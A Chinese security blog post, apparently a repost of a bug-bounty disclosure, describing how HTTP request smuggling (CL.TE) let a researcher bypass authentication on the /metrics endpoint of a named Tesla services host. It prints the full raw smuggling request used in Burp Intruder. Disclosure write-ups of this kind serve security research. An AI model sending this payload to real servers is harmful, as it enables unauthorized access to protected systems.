api漏洞系列-通过请求走私绕过Authentication

admin

102737
文章

87
评论

2023年2月21日13:27:04评论38 views字数 737阅读2分27秒阅读模式

api漏洞系列-通过请求走私绕过Authentication

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

前言

这个漏洞是由白帽小哥riramar 发现的,小哥发现特斯拉某个域名下服务容易受到HTTP请求走私的攻击，从而允许攻击者绕过前端安全控制。

POC(复现步骤)

当你访问https://apm.ap.tesla.services/metrics 时会返回 401（未经授权）。

通过使用 CLTE 有效负载执行下面的 Burp Intruder 攻击，攻击者可以绕过前端并访问https://apm.ap.tesla.services/metrics

注意:这里涉及到请求走私的相关知识

POST /?cb=906971031432954 HTTP/1.1
Transfer-Encoding : chunked
Host: apm.ap.tesla.services
Connection: keep-alive
ID: §0§
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

1
Z
0

GET /metrics HTTP/1.1
Host: apm.ap.tesla.services

0

原文始发于微信公众号（迪哥讲事）：api漏洞系列-通过请求走私绕过Authentication

左青龙
微信扫一扫

右白虎
微信扫一扫

api漏洞系列-通过请求走私绕过Authentication

前言

POC(复现步骤)

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

漏洞挖掘 | 某米企业src未授权访问

初遇内嵌WebShell的pdf文件

Hackerone 附件功能存在IDOR越权漏洞15000$

从环境搭建到内网渗透靶机

漏洞挖掘之某厂商OAuth2.0认证缺陷

发表评论

在线咨询

微信